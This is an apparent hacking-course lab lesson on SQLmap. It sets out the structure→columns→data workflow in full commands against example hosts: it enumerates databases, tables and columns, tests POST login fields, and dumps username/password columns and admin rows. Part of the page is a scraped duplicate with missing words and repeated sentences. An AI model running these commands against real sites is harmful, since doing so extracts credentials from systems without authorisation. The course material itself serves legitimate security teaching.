When SQLmap detects an injection, it is important to understand the database structure before dumping data.

With these tools, a clear picture of the database is obtained, and the dump can be targeted only at critical data.

The first step is to determine which databases are present on the server.

Once you know the database name, focus all subsequent actions on it.

Now all searches and dumps only concern the customer registry database.

Next, the tables of the selected database are listed.

This way, we see what is inside the database.

Once the table is identified, you can limit searches to only that table.

This way, data is shown only from the users table.

The table contains columns (e.g., username, email, password). The --columns switch helps you determine what columns are in the table.

This way, you can see exactly which fields are in the table and target the dump, for example, to passwords.

Once you know the column names, you can select only those that are of interest. This speeds up the dump and reduces the unnecessary disclosure of sensitive information.

SQLmap only retrieves the ID and password columns.

 requests to send user input, for example in login forms, searches, or registration forms. SQLmap can automatically test these requests for SQL injection once you provide the data that is being sent via POST.

 switch. It allows SQLmap to handle form fields just like URL parameters.

SQLmap automatically tests both the user and pass parameters for SQL injection vulnerabilities.

 in SQLmap to extract the contents of a table, by default it will fetch all rows. Sometimes this isn’t necessary – maybe you only want to see specific users, or rows where a certain role is set.

 switch, you can provide an SQL-style condition that restricts which rows are extracted. It works just like a WHERE clause in a normal SQL query.

You have a users table with 10,000 entries.

Dumping everything would be slow and heavy.

Instead, your goal is to extract only the admin users.

SQLmap will only retrieve the rows from the users table where the role is admin.

These switches are usually used in this order:

 → target a specific database for testing

 → list the columns and types of the table

 → select only specific columns for dumping

This is the classic SQLmap workflow: structure → columns → data. It allows you to see the overall picture first and then decide what information actually needs to be extracted.

In this lab, you will practice using Sqlmaps basic functions.

MySQL Sqlmap login

When SQLmap detects an injection, it is important to understand the database structure before dumping data.

- What databases exist?
- What tables do they contain?
- What columns do the tables contain?

With these tools, a clear picture of the database is obtained, and the dump can be targeted only at critical data.

## --dbs – list databases

The first step is to determine which databases are present on the server.

**Example:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --dbs
```

Result:

```sh
Available databases [3]:
[*] information_schema
[*] customer_registry
[*] product_data
```

All available databases.

---

## -D – select database

Once you know the database name, focus all subsequent actions on it.

**Example:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry
```

Now all searches and dumps only concern the customer registry database.

---

## --tables – list tables

Next, the tables of the selected database are listed.

**Example:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry --tables
```

Result:

```sh
Database: customer registry
[2 tables]
+-----------+
| users     |
| orders    |
+-----------+
```

This way, we see what is inside the database.

---

## -T – select table

Once the table is identified, you can limit searches to only that table.

**Example:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users
```

This way, data is shown only from the users table.

---

## --columns – list columns

The table contains columns (e.g., username, email, password). The --columns switch helps you determine what columns are in the table.

**Example:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users --columns
```

Result:

```sh
Database: Customer Registry
Table: Users
[4 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| id       | int(11)      |
| username | varchar(50)  |
| password | varchar(255) |
| role     | varchar(20)  |
+----------+--------------+
```

This way, you can see exactly which fields are in the table and target the dump, for example, to passwords.

---

## -C – select columns for dumping

Once you know the column names, you can select only those that are of interest. This speeds up the dump and reduces the unnecessary disclosure of sensitive information.

**Example:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users -C username,password --dump
```

SQLmap only retrieves the ID and password columns.

---

## --post – Testing Form Data Effectively

Many web applications use **POST** requests to send user input, for example in login forms, searches, or registration forms. SQLmap can automatically test these requests for SQL injection once you provide the data that is being sent via POST.

This is done with the **--data** switch. It allows SQLmap to handle form fields just like URL parameters.

**Example:**

```sh
sqlmap -u "http://site.com/login.php" --data="user=admin&pass=password"
```

SQLmap automatically tests both the user and pass parameters for SQL injection vulnerabilities.

or

choose only one or specific parameters

```sh
sqlmap -u "http://site.com/login.php" --data="user=admin&pass=password" -p user
```

---

## --where – choose what you want to see

When you run **--dump** in SQLmap to extract the contents of a table, by default it will fetch all rows. Sometimes this isn’t necessary – maybe you only want to see specific users, or rows where a certain role is set.

With the **--where** switch, you can provide an SQL-style condition that restricts which rows are extracted. It works just like a WHERE clause in a normal SQL query.

**Example:**

- You have a users table with 10,000 entries.
- Dumping everything would be slow and heavy.
- Instead, your goal is to extract only the admin users.

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users --dump --where="role='admin'"
```

SQLmap will only retrieve the rows from the users table where the role is admin.

---

## Workflow in Practice

These switches are usually used in this order:

**List databases:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" --dbs
```

**Select one of them:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry
```

**List tables:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry --tables
```

**Select table:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users
```

**List table columns:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users --columns
```

**Filter relevant columns:**

```sh
sqlmap -u "http://sivu.fi/hae.php?id=1" -D customer_registry -T users -C username,password --dump
```

---

## Summary

- **--dbs** → list all databases
- **-D** → target a specific database for testing
- **--tables** → list tables in the database
- **-T** → limit testing to a single table
- **--columns** → list the columns and types of the table
- **-C** → select only specific columns for dumping

This is the classic SQLmap workflow: structure → columns → data. It allows you to see the overall picture first and then decide what information actually needs to be extracted.

@exercise 39ea759613d0


SQLmap and reading databases

SQL injection is probably the cause of the majority of serious data breaches, mainly because vulnerability is very likely in a large application if the technology choices are bad, and the result is usually leaking the entire database to the attacker.

SQL injection is likely the cause of the majority of serious data breaches, mainly because vulnerability is very likely in a large application if the technology choices are poor, and the consequence is usually the leakage of the entire database to the attacker.

SQLmap and reading databases

--dbs – list databases

Learn to hack — start here